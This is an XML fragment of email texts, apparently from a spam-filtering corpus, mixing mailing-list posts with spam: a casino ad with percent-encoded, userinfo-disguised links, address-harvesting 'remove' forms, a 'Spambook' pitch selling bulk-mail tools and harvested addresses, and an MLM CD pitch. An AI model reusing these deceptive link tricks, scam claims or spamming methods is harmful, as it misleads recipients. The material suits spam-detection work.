                         &lt;td colspan=3D"6"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Company:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"6"&gt;=20
                           &lt;input type=3D"text" name=3D"company" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Address:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"6"&gt;=20
                           &lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"15"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"9%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"8%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"9%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Zip:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"2"&gt;=20
                           &lt;input type=3D"text" name=3D"zip" size=3D"5"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"6"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"6"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Website:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;=20
                           &lt;input type=3D"text" name=3D"website" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 width=3D"15%"&gt;&lt;img src=3D"http://63.211.81.87/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"9%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"drogers@insbuyer.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"InsBuyer Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;/b&gt;&lt;/font&gt;&lt;a href=3D"http://www.insbuyer.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/insb/20020501-3.gif" width=3D"462" =
 height=3D"80" border=3D"0" alt=3D"InsBuyer.com - The Insurance Buyer's =
 Guide"&gt;&lt;/a&gt;&lt;br&gt;
             &amp;nbsp;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&lt;img height=3D'1' width=3D'1' border=3D'0' src=3D'304704'&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_346C22_01C1F83E.20E71340--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Archive Question
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Uh, guys?  I can't seem to find the RPMs anymore.  Does anyone else remember the URL?
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 I don't want to hear news from Isreal until the news contains the words
 "Bullet", "Brain", and "Arafat".
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">You need to run the dos setup program for the 3c509 and turn off plug 'n' play in the card's firmware I think you will find.
 Bod
 &gt; 
 &gt; Hi folks,
 &gt; 
 &gt; I decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.
 &gt; 
 &gt; However I have encountered one problem, my network card now dosent work, well kind of dosent work...
 &gt; 
 &gt; Instead of one eth0 on IRQ 10 I now get:
 &gt; Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.
 &gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 &gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 &gt; Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.
 &gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
 &gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
 &gt; 
 &gt; This results in the interface(s) coming up but while packets can go out they can not come in.
 &gt; 
 &gt; I've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.
 &gt; 
 &gt; Anyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?
 &gt; 
 &gt; Cheers,
 &gt; ~Al
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Mike Masnick wrote:
 &gt;Why is it that people don't understand that giving stuff away is a 
 &gt;perfectly acceptable tactic in capitalist businesses?  In many places, it's 
 &gt;called "advertising": "buy one, get one free"
 I'll just take the free one, OK?
 No?
 Oh, so actually it's not free at all; you're just bundling, with a unit
 price half of what's advertised.
 How about some truth in that advertising?
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi Janet, are you going to call me?                     LOWVW
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor=3D"#003300"&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;Congratulations, 
 You Won $30 Free&lt;BR&gt;Today At The Internet's Best &amp;amp; Most&lt;BR&gt;Trusted On-=
 Line 
 Casino!&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#669966&gt;&lt;FONT color=3D#ffffff size=3D4&gt;To =
 Collect Your 
 $30 Cash &lt;/FONT&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%6
 3%61%73%69%6e%6f.%63%6f%6d"&gt;&lt;FONT 
 size=3D4&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%6
 3%61%73%69%6e%6f.%63%6f%6d"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%81900955key=3D96589521081900955index=3DA2=
 1r7P6qW81900955.79048@%77%77%77.%70%72%65%73%74%69%67%6
 5%63%61%73%69%6e%6f.%63%6f%6d/%70ic/%70%72e%76ie%77%73/%62i%67/%62%6cac%6b=
 %6aac%6b.%6a%70%67" 
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;To Collect Your $30 Cash =
 &lt;/FONT&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%6
 3%61%73%69%6e%6f.%63%6f%6d"&gt;&lt;FONT 
 size=3D5&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%6
 3%61%73%69%6e%6f.%63%6f%6d"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%21362822key=3D96589521021362822index=3DA2=
 1r7P6qW21362822.4140327@%77%77%77.%70%72%65%73%74%69%67
 %65%63%61%73%69%6e%6f.%63%6f%6d/%70ic/a%77a%72%64%73/%67om%5f%74o%70ca%73i=
 %6eo%5f%64a%72%6b%31.%67i%66" 
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;
 &lt;form name=3D"form" method=3D"post" 
 action=3D"http://members.triposd.uk%21112141key=3D96589521021112141index=3D=
 A21r7P6qW21112141.7607236@%77%77%77.%63%79%62%65%72%78
 %63%61%73%69%6e%6f.%63%6f%6d/%72/%70%72oce%73%73%5fc%6cea%6e%6ci%73%74.%70=
 h%70"&gt;
 &lt;DIV align=3Dcenter&gt; 
             &lt;table width=3D"391" border=3D"1" cellspacing=3D"0" cellpaddin=
 g=3D"0" align=3D"center" bordercolor=3D"#000000"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"2" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;
             &lt;P&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;This=
  message is sent in compliance of the new 
             e-mail bill:&lt;BR&gt;SECTION 301 Per Section 301, Paragraph (a)(2)(=
 C) of 
             S. 1618,&lt;BR&gt;Further transmissions to you by the sender of this=
  email 
             maybe&lt;BR&gt;stopped at no cost to you by entering your email addr=
 ess 
             to&lt;BR&gt;the form in this email and clicking submit to be 
             automatically&lt;BR&gt;   
                                removed. &lt;/font&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;To be Removed f=
 rom our 
             Opt-In mailing list. Please enter your email address in the pr=
 ovided 
             box below and click remove, thank you. 
       &lt;/FONT&gt;&lt;/P&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt; 
                           &lt;input type=3D"hidden" name=3D"subject" value=3D=
 "REMOVE"&gt;
                           &lt;input name=3D"email" size=3D"30" 
            &gt;
                           &lt;input type=3D"submit" name=3D"Submit" value=3D"=
 REMOVE"&gt;
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;Your 
                           E-mail Address Will Be Immediately Removed From =
 All Mailing Lists&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/DIV&gt;
         &lt;/form&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 23 Jul 2002, Jim Whitehead wrote:
 &gt; You can download a Pastry simulator off of this web site.
 Why should I download anything from Microsoft? My firstborn is my and my 
 alone. No technology is worth that price. (And since when is Redmond into 
 technology? Weather reports from Dis are so far unchanging).
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Never Pay eBay Fees Again!!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I'm a college dropout.  I work about two hours a day.  
 I'm ambitious, but extremely lazy, and I make over 
 $250,000 a year.  Are you curious yet?
 In a minute I'm going to tell you my secret,
 it's the dirty little secret of the Internet ...
 You've probably heard stories about people making
 whopping huge money online, but you thought they 
 were the big corporate execs, famous programmers, or
 boy-geniuses.
 Well, grasshopper, think again ...
 It's people like you and me that are making the real
 money.  Yep, people like YOU AND ME!
 Ever since the "dot com bubble" burst in 1999, small-time
 entrepreneurs are getting richer while the Fortune 500 
 companies look for bankruptcy lawyers.
 Today small business owners and ordinary folks 
 like you and me can use the web to achieve complete 
 financial freedom with NO INVESTMENT and very little 
 work.  How?  By learning the most profitable marketing 
 technique ever created - it's called bulk email, or SPAM.
 If you've ever recieved an email advertisement, then 
 you know what bulk email is.  I bet you can't click on 
 DELETE fast enough for most of those ads, right?
 You might not want their product, but remember that 
 thousands of other folks probably do.  Bulk email is a 
 percentage game - every bulk emailer who contacts you 
 makes a six figure income on the Internet.  I 
 guarantee it.  Now let's go back to Math 101 and 
 review some numbers ...
 If you sell on eBay, you pay anywhere from a few
 dollars to over a hundred dollars just to post one
 auction.  How many people see your ad?  Maybe a
 couple thousand or even ten or twenty thousand
 over a period of days.  Using bulk email, YOU CAN
 SEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY
 at virtually no cost.  Whether your send 100,000
 emails or 100 million emails, the price is the same.
 ZERO!
 Stop paying those outrageous auction listing fees when
 hardly anyone sees your ad!
 Imagine that you have a decent product with a 
 profit margin of $20.00 on each sale.  If you send 
 an email ad to 500,000 people, and only one person 
 in a thousand actually places an order, then you just 
 generated 500 orders and made $10,000 in a few hours 
 of work.  
 It's that simple ...
 All you have to do is convince ONE PERSON OUT OF A
 THOUSAND to buy your stuff and you're FILTHY RICH.
 The best thing is that anyone can do it.  Doesn't 
 matter if you're a nineteen-year-old college student 
 using a dorm-room computer or a fifty-year-old 
 executive working from an office building in New 
 York City.  Anyone, and I repeat ANYONE, can start 
 bulk emailing with virtually no startup costs.  All it takes 
 is a  few days of study, plenty of ambition, and some 
 basic familiarity with the Internet.
 I quit college when I was 19 to capitalize on the 
 "Dot Com" mania, and I've never looked back.  I 
 started with no money, no product to sell, and only 
 the most rudimentary computer skills.  I saw an 
 opportunity and I seized it.  A few years later, 
 I bought my own home - with CASH.  
 You don't need any money.  You don't need a product.
 You don't need to be a computer nerd and no experience
 whatsoever is required.  
 If you saw an employment ad in the newspaper like that
 you'd jump right on it.  It would be a dream come true.
 So what are you waiting for?!
 I'm going to ask you four simple questions.  If you answer
 YES to all of them, then I can almost promise that you
 will make at least $100,000 using bulk email this year.
 Here goes ...
 Do you have basic experience with the web? 
 Do you have a computer and an Internet connection?
 Do you have a few hours each day of free time?  
 Do you want to earn some extra money with an eye towards 
 complete financial freedom?  
 If you answer YES to these questions, you could be
 making $5,000 - $20,000 per week working from your 
 home.  Kiss your day job goodbye - this sure beats 
 the 9-5 daily grind!
 All you need is ambition and commitment.  This
 is no "get rich quick scheme".  You have to work
 to make big bucks, but ANYONE - and I mean ANYONE - can do 
 it.
 You're probably wondering if it's hard to get started.  
 Don't worry, it's not! I will show you step-by-step 
 how to start your first email campaign and how to
 build a booming online business.  You'll be generating 
 orders - AND MAKING MONEY - in less than seven days.
 Okay, so what if you don't have anything to sell?
 No problem!!  I'll show you where to find hot
 products that sell like CRAAAAAAZY! Most people delay
 starting an Internet business because they have 
 nothing to sell, but I'm removing that hurdle right now.  
 After reading the Spambook, you can build your complete 
 product line in less than two hours!  There is NO EXCUSE 
 not to get started! I will get you up-and-running within 
 seven days. In fact ...
 I personally guarantee that you will start your own 
 bulk email campaign less than a week after reading 
 the Spambook!  I'll give you a toll-free phone number 
 to reach me 24 hours a day, seven days a week; 
 where else will you find that level of service?!
 I will also include a step-by-step guide to starting 
 your very first email campaign called "Seven Days to 
 Bulk Email Success".  This seperate guide contains a daily 
 routine for you to follow with specific, exact 
 instructions on how to get started.  On day one, for 
 example, I teach you where to find a product to sell. 
 The next day you learn how to build a fresh mailing 
 list.  On the seventh day, you just click send!  Your 
 very first campaign is ready to go.
 As a special bonus, you'll recieve a FREE copy 
 of our STEALTH MASS MAILER, a very powerful bulk 
 email program which retails for $49.99! I'll even
 include 7 million email addresses absolutely FREE
 if you order NOW!
 Stop wasting your money on auction listing fees, 
 classifieds, and banner ads - they don't work, and 
 never will!  If you are SERIOUS about making money 
 on the Internet, bulk email is your only option.  
 What are you waiting for?  Few of us are willing 
 to share this knowledge, but I promise to teach 
 you everything I know about bulk emailing in this 
 extraordinary bulk emailer's handbook ... The Spambook! 
 Once again, here's the deal.  You give me $29.99.  
 I give you ALL THE TOOLS YOU NEED to become a
 successful, high profit email bulk emailer.  INCLUDING:
 ** THE SPAMBOOK
 Teaches you step-by-step how to become a high profit
 bulk emailer.  Secret techniques and tips never
 before revealed.
 ** SEVEN DAYS TO BULK EMAIL SUCCESS
 Provides detailed day-by-day instruction to start sending
 your first email campaign in seven days.
 ** 600 Email subjects that PULL LIKE CRAZY
 ** EMAIL LIST MANAGER
 Manage your email lists quickly and easily.  Very 
 user-friendly, yet powerful, software.
 ** STEALTH MASS MAILER
 Software can send up to 50,000 emails an hour automatically.
 Just load them in there and click SEND!
 ** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
 Extracts email addresses from databases and search engines
 at speeds of over 200,000 per hour.
 ** WORLDCAST EMAIL VERIFIER
 Used to verify your email addresses that you extract to 
 make sure they're valid.
 ** EBOOK PUBLISHER
 Easily publish your own e-books and reports for resale using,
 you guessed it, bulk email!
 ** SEVEN MILLION EMAIL ADDRESSES
 This huge list will get you started bulk emailing right away.
 I harvested these addresses myself, the list is filled
 with IMPULSE BUYERS ready to respond to your ads!
 If you added up all of the FULL VERSION BULK EMAIL software
 included with the Spambook package, it would total over
 $499.  I am giving you the whole bundle for only $29.99.
 That means there is no other out-of-pocket startup expense
 for you.  Nothing else to buy, no reason to waste money on
 software that doesn't work.  With this one package, you get 
 EVERYTHING YOU NEED to START BULK EMAILING RIGHT AWAY.  
 Are you willing to invest $29.99 for the opportunity
 to make a SIX FIGURE INCOME on the Internet
 with no startup cash and very little effort?
 Remember, you will recieve a toll-free phone number
 for 24 hour expert advice and consultation FROM ME
 PERSONALLY.
 To order the Spambook right now for only $29.99 with 
 a Visa or Mastercard, please click on the link below. 
 This will take you to our secure server for order 
 processing:
 https://www.paypal.com/xclick/business=myblack93pgt%40hotmail.com&amp;item_name=Spambook&amp;item_number=Spambook&amp;amount=%2429.99
 Note: The Spambook will be delivered electronically
 within 24 hours. It is not available in printed form. 
 You may also pay with cash, check or money
 order by printing the order form below and 
 sending it with your payment. 
 ------------------------- CUT HERE ----------------------- 
 Product: "The Spambook" 
 Price: $29.99 
 HOW TO ORDER BY MAIL: Print out this order 
 form and send cash, personal check, money 
 order or cashier's check to the address listed below: 
 Blair Russell   
 RR#2 Coulsons Hill Road #2452
 Bradford, Ontario, Canada
 L3Z 2A5
 Your Shipping Information: 
 Your Name_____________________________________________ 
 Your Address__________________________________________ 
 Your City_____________________________________________ 
 State / Zip___________________________________________ 
 Phone #: _____________________________________________ 
 (For problems with your order only. No salesmen will call.) 
 Email Address________________________________________ 
 If paying by credit card, please fill in the information below: 
 Credit Card Number:________________________________ 
 Expiration Date:___________________________ 
 Signature:_________________________ 
 Date:____________________ 
 IMPORTANT LEGAL NOTE: There are no criminal laws against
 the non-fraudulent sending of unsolicited commercial email 
 in the United States.  However, other countries have passed
 laws against this form of marketing, so non-US residents 
 should check local regulations before ordering.  To view
 US State and Federal guidelines concerning bulk email, and to 
 check foreign regulations, please visit http://www.spamlaws.com
 8112Qkxd9-941DIFV3249esWe6-294Awtq1l33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</si>
  <si>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
 I wonder if the CEO dig also suggests proprietary software vendors
 may in fact be /physiologically/ sociopathic...
 damn, now I've just been defacto excluded from yet another well-paid
 subculture!  it's just not my day.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Press Release
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_005D_01C1BE1C.740AA160
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 The Business Opportunity Alliance Releases the Sale of New Plug-n-Play
 Smart CD.
 Ground Breaking CD, NEW BIZ-OP GOLD SMART CD, Is already Storming the
 market. BizOppInaBox,Tampa Florida-January 20,2002- Business Opportunity
 Alliance today announced their
 NEW BIZ-OP GOLD SMART CD, a plug and play Software, which Features State
 of the ART Marketing Technology, and Training for the Internet =
 entrepreneur.
 The New BIZ-OP Gold CD brings first to market absolutely everything an
 entrepreneur needs to go from Kindergarten to Masters in Internet =
 Marketing,
 all in one place. The New NEW BIZ-OP GOLD SMART CD, includes the =
 Microsoft
 Licensed BOIAB Internet Explorer Web browser for Home Based Business,=20
 Earth-link Sprint Dial-up, Cable and DSL services,  is the most =
 affordable,
 and comprehensive resource in the offline or online world, with features
 that no one else in the industry has. With the ability to update the CD
 monthly the entrepreneur will be able to keep pace with the latest =
 resources
 and software available on the internet.
 "The new BIZ-OPP GOLD SMART CD, contains everything the entrepreneur =
 needs
 to take their business to the next level, and will be available =
 worldwide,
 said Gary Shawkey, CEO of Business Opportunity Alliance.
 Pricing and Availability
 =20
 The new NEW BIZ-OP GOLD SMART CD is available for purchase as of January
 20th 2001 and will be shipped starting February 8th.  CD will be =
 available
 through the Business Opportunity Alliance =
 (http://www.bizoppalliance.com/member1849 ,
 by telephone at 800-727-6815 and give code#1849 and through our 60,000 =
 authorized distributors worldwide.  Pricing and availability of the NEW =
 BIZ-OP GOLD SMART CD and=20
 further details of the features of the CD are listed below.=20
 NEW BIZ-OP GOLD SMART CD for a retail price of  $49.97(US) includes:
 BOIAB Internet Explorer 6.0 (A Microsoft Exclusively Licensed Product) =20
 Complete Email Links (with Folders!) =20
 Links to Advertising Sites that Work (and Ideas!) =20
 Search Engines =20
 Webmaster Tools =20
 Simple Plug n' Play installation a 2 year old could do! =20
 and MUCH more...=20
 Get the CD ROM and Become an Associate!
 Associates are eligible to receive $25 commissions on
 the sale of each CD.
 Specifically, Our BizOpp Gold CD Software Includes:
 Ads &amp; Ideas=20
 1000's of Links=20
 Working Email Folders=20
 Submission Ideas=20
 Contact Information=20
 Personal Tagging=20
 Program Site Links=20
 1000's of Classified Ad Sites=20
 Online Virus Scan=20
 PayPal Access=20
 Email Program Links=20
 Webmaster Tools=20
 Incoming Mail Folders=20
 Source Codes=20
 HTML Editors=20
 Search Engines=20
 Help Desk=20
 Tracking System Preview=20
 Opt-in List System Preview=20
 Easy Plug and Play Installation=20
 And Much, Much More...=20
 Cost for this BIZ-OPP GOLD SMART CD is only $49.97 (Plus $6.79 shipping
 and handling for US/Canada or $11.79 for International shipments!)
 The Business Opportunity Alliance Research and Development team will be
 working to provide the most advanced and up to date marketing software =
 and
 marketing techniques for consumers of the CD and have a top Programming =
 team
 to configure upgrades to the software which will be downloadable via the
 internet for only $1.00 USD per month.
 For more information, please click here =
 http://www.promoneymail.com/member1849
 This is not a spam - we have had contact in the past,  for removal from =
 my list email ardi8@lycos.com with Remove in the subject box.
 ------=_NextPart_000_005D_01C1BE1C.740AA160
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;&lt;FONT size=3D3&gt;The Business Opportunity Alliance =
 Releases the=20
 Sale of New Plug-n-Play&lt;BR&gt;Smart CD.&lt;BR&gt;&lt;BR&gt;Ground Breaking CD, NEW =
 BIZ-OP GOLD=20
 SMART CD, Is already Storming the&lt;BR&gt;market. BizOppInaBox,Tampa =
 Florida-January=20
 20,2002- Business Opportunity&lt;BR&gt;Alliance today announced =
 their&lt;BR&gt;&lt;BR&gt;NEW=20
 BIZ-OP GOLD SMART CD, a plug and play Software, which Features =
 State&lt;BR&gt;of the=20
 ART Marketing Technology, and Training for the Internet =
 entrepreneur.&lt;BR&gt;The New=20
 BIZ-OP Gold CD brings first to market absolutely everything =
 an&lt;BR&gt;entrepreneur=20
 needs to go from Kindergarten to Masters in Internet Marketing,&lt;BR&gt;all =
 in one=20
 place. The New NEW BIZ-OP GOLD SMART CD, includes the =
 Microsoft&lt;BR&gt;Licensed=20
 BOIAB Internet Explorer Web browser for Home Based Business, =
 &lt;BR&gt;Earth-link=20
 Sprint Dial-up, Cable and DSL services,&amp;nbsp; is the most =
 affordable,&lt;BR&gt;and=20
 comprehensive resource in the offline or online world, with =
 features&lt;BR&gt;that no=20
 one else in the industry has. With the ability to update the =
 CD&lt;BR&gt;monthly the=20
 entrepreneur will be able to keep pace with the latest resources&lt;BR&gt;and =
 software=20
 available on the internet.&lt;BR&gt;&lt;BR&gt;"The new BIZ-OPP GOLD SMART CD, =
 contains=20
 everything the entrepreneur needs&lt;BR&gt;to take their business to the next =
 level,=20
 and will be available worldwide,&lt;BR&gt;said Gary Shawkey, CEO of Business=20
 Opportunity Alliance.&lt;BR&gt;&lt;BR&gt;Pricing and Availability&lt;BR&gt;&amp;nbsp;&lt;BR&gt;The =
 new NEW=20
 BIZ-OP GOLD SMART CD is available for purchase as of January&lt;BR&gt;20th =
 2001 and=20
 will be shipped starting February 8th.&amp;nbsp; CD will be =
 available&lt;BR&gt;through the=20
 Business Opportunity Alliance (&lt;/FONT&gt;&lt;A=20
 href=3D"http://www.bizoppalliance.com"&gt;&lt;FONT size=3D3&gt;&lt;A=20
 href=3D"http://www.bizoppalliance.com/member1849"&gt;http://www.bizoppallian=
 ce.com/member1849&lt;/A&gt;=20
 &lt;/FONT&gt;&lt;FONT size=3D3&gt;,&lt;BR&gt;by telephone at 800-727-6815 and give=20
 code#1849&amp;nbsp;and through our 60,000 authorized distributors =
 worldwide.&amp;nbsp;=20
 Pricing and availability of the NEW BIZ-OP GOLD SMART CD and &lt;BR&gt;further =
 details=20
 of the features of the CD are listed below. &lt;BR&gt;&lt;BR&gt;NEW BIZ-OP GOLD =
 SMART CD for=20
 a retail price of&amp;nbsp; $49.97(US) includes:&lt;BR&gt;&lt;BR&gt;BOIAB Internet =
 Explorer 6.0=20
 (A Microsoft Exclusively Licensed Product)&amp;nbsp; &lt;BR&gt;&lt;BR&gt;Complete Email =
 Links=20
 (with Folders!)&amp;nbsp; &lt;BR&gt;&lt;BR&gt;Links to Advertising Sites that Work (and=20
